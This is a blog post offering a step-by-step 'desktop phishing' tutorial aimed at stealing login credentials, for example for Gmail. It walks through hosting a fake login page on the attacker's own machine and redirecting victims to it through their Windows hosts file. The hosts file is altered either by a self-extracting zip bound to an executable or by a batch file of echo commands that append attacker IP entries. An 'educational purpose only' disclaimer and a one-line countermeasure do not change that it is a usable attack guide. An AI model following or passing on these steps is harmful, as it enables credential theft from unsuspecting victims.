Home » Windows » Desktop Phishing - Step by step tutorial

Sunday, March 23, 2014

Desktop Phishing - Step by step tutorial

Sunday, March 23, 2014 by Unknown

~~~Desktop Phishing - Step by step tutorial~~~ 


 Note :- This is for Educational Purpose only!!!!!! 


Two Steps to perform attack :- 

1. Create and host phishing page on your computer. 

2. Modify victim's host file 

Step 1 -: 

Since the webshosting sites like 110mb.com, ripway.com etc... Where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp. Kindly read my simple tutorial on setting up XAMPP webserver hereand this step would be clear to you. 


Step 2.This step can performed in two different ways. 


Method 1 - Send victim a zip file containing modified host file .
When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.
Now Copy your hosts file and paste it anywhere.
Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show. 
Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP ' xxx.xxx.xxx.xxx'.Replace it with your public IP. 
Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file. Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done . 



Method 2 - Create a batch file which would modify hosts file as per your need. Open your notepad and type the following text echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself. Save file as 'all files' instead of txt files and name it anything.bat . 
Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file. You can test both the above methods to modify your own hosts file 

Limitations of attack :-

 1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP. 

2.The browser may warn the victim that Digital Certificate of the website is not genuine. Countermeasures:- Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.

Tags: , , , , ,

About : Raja CRN

author

Author description goes here. Author description goes here. Follow him on Twitter

0 Responses to “Desktop Phishing - Step by step tutorial”

Post a Comment

Subscribe to: Post Comments (Atom)

Subscribe

Donec sed odio dui. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio. Duis mollis

© 2013 Old is Gold. All rights reserved.
Designed by SpicyTricks